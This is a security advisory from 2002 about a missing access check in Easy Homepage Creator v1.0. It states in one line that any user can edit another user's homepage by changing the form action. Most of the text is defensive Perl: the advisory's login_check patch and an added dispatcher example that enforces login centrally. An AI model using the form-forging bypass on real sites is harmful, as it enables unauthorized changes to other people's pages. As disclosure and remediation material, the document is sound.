29th Jul 2002 [SBWID-5567]
COMMAND
Easy Homepage Creator privilege escalation
SYSTEMS AFFECTED
Advanced Easy Homepage Creator v1.0
Easy Homepage Creator v1.0
PROBLEM
From the AresU advisory [http://bosen.net/advisories/aresu-adv.001.txt]:
Everyone can easily change another user's homepage, without access
validation.
Exploit:
=======
Change the action in the HTML form.
SOLUTION
Add access validation to the "print_html_to_file" function. Add this
code to edit.cgi:
sub login_check
{
    # Both fields must be present before anything else is done.
    if ($FORM{'username'} eq "" or $FORM{'password'} eq "")
    {
        dienice("Sorry, but you haven't entered a Username or Password. Please press the 'back' button on your browser to return to the login screen.");
    }
    $FORM{'username'} =~ tr/A-Z/a-z/;
    $FORM{'password'} =~ tr/A-Z/a-z/;
    # Added check: the username is used to build a file path below, so
    # only allow characters that cannot escape the profiles directory.
    if ($FORM{'username'} !~ /^[a-z0-9_]+$/)
    {
        dienice("Sorry, but you have entered an invalid username or password. Please press the 'back' button on your browser to return to the login form.");
    }
    open(PROFILE, "<$rootdir/profiles/$FORM{'username'}.pro")
        || dienice("Sorry, but you have entered an invalid username or password. Please press the 'back' button on your browser to return to the login form.");
    my @DATA = <PROFILE>;
    chomp(@DATA);
    close(PROFILE);
    # Profile layout as in the original: line 2 is the username, line 3 the password.
    if (!($FORM{'username'} eq $DATA[1] && $FORM{'password'} eq $DATA[2]))
    {
        dienice("Sorry, but you have entered an invalid username or password. Please press the 'back' button on your browser to return to the Login Form and try logging-in again.");
    }
    open(CHECK_USERNAME, "<$rootdir/profiles/ban_users.dat")
        || dienice("Configuration Error! Unable to open ban_users.dat file for reading. Please contact the webmaster of this web site. The following error occurred : $!");
    my @check = <CHECK_USERNAME>;
    chomp(@check);
    close(CHECK_USERNAME);
    foreach my $line (@check)
    {
        # \Q...\E quotes regex metacharacters so the user-supplied name
        # cannot change the meaning of the match.
        if ($line =~ /\Q$FORM{'username'}\E/i)
        {
            dienice("Sorry, but you have been banned from using the Homepage Creator. You should have been sent an email explaining why you have been banned from using the Homepage Creator. For more details contact the webmaster of this web site.");
        }
    }
}

sub dienice
{
    my ($msg) = @_;
    print <<EndHTML;
<html>
<head>
<title>Homepage Login Error</title>
</head>
<body bgcolor="$bg_colour" link="$hyperlinks_colour" vlink="$hyperlinks_colour" alink="$hyperlinks_colour">
<p align="center">$logo_url $banner_url</p>
<hr color="$linebreakcolour">
<p align="left"><b>Homepage Login Error</b></p>
<p align="left"><b>$msg</b></p>
<hr color="$linebreakcolour">
<p align="center"><b>&copy; Copyright <a href="http://www.easyscripts.co.uk">Easy Scripts Archive</a> 2001. All Rights Reserved.</b></p>
</body>
</html>
EndHTML
    exit;
}
And add this call as the first line of the "print_html_to_file" function:
&login_check;
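The advisory's fix inserts &login_check; into the one function that was reachable without credentials. The following Perl script is an added example, not code from the advisory or from Easy Homepage Creator, and it generalizes the fix: the form's "action" value is looked up in a table that records whether the handler needs a logged-in user, and the dispatcher enforces the check before any handler runs, so no single function can be reached unauthenticated by editing a hidden form field. The profile store, ban list, action names other than print_html_to_file, and the sample requests are all constructed for the example.

```perl
#!/usr/bin/perl
# Added example: central enforcement of the login check in a CGI
# dispatcher. The data and handler names here are constructed; only
# print_html_to_file is taken from the advisory.
use strict;
use warnings;

# Constructed in-memory stand-in for profiles/*.pro and ban_users.dat;
# a real script would read these from $rootdir/profiles instead.
my %profiles = (
    alice => { password => 'wonderland' },
    bob   => { password => 'builder' },
);
my %banned = map { $_ => 1 } qw(bob);

# Every action that changes data is marked requires_login; the
# dispatcher enforces it, so forgetting a per-function check can no
# longer silently reopen the hole.
my %actions = (
    view_html          => { requires_login => 0, handler => \&view_html },
    print_html_to_file => { requires_login => 1, handler => \&print_html_to_file },
);

# Returns the validated, lower-cased username on success, undef on
# failure; the caller decides how to report the failure.
sub login_check {
    my ($form) = @_;
    my $user = lc($form->{username} // '');
    my $pass = $form->{password} // '';
    return undef if $user eq '' || $pass eq '';
    # Only allow characters that cannot escape the profiles directory
    # when the name is later used to build a file path.
    return undef unless $user =~ /^[a-z0-9_]+$/;
    my $profile = $profiles{$user} or return undef;
    return undef unless $profile->{password} eq $pass;
    # Exact-match ban lookup: the user-supplied name is never
    # interpreted as a regex or matched as a substring.
    return undef if $banned{$user};
    return $user;
}

sub view_html {
    my ($form, $user) = @_;
    return "viewing " . ($form->{page} // '');
}

sub print_html_to_file {
    my ($form, $user) = @_;
    # The target file is derived from the authenticated identity, not
    # from a form field, so a logged-in user can only write their own page.
    return "would write $user.html";
}

sub dispatch {
    my ($form) = @_;
    my $name  = $form->{action} // '';
    my $entry = $actions{$name} or return "error: unknown action";
    my $user;
    if ($entry->{requires_login}) {
        $user = login_check($form)
            or return "error: invalid username or password, or account banned";
    }
    return $entry->{handler}->($form, $user);
}

# Constructed requests: a forged action with no credentials, a banned
# user with a correct password, and a valid login.
print dispatch({ action => 'print_html_to_file' }), "\n";
print dispatch({ action => 'print_html_to_file', username => 'Bob', password => 'builder' }), "\n";
print dispatch({ action => 'print_html_to_file', username => 'alice', password => 'wonderland' }), "\n";
```

Two deliberate differences from the advisory's login_check: the password is compared as entered rather than lower-cased, since lower-casing it shrinks the space an attacker has to guess, and the ban list is a hash keyed by exact username rather than a regex match over each line, so a banned "bob" does not also lock out "bobby".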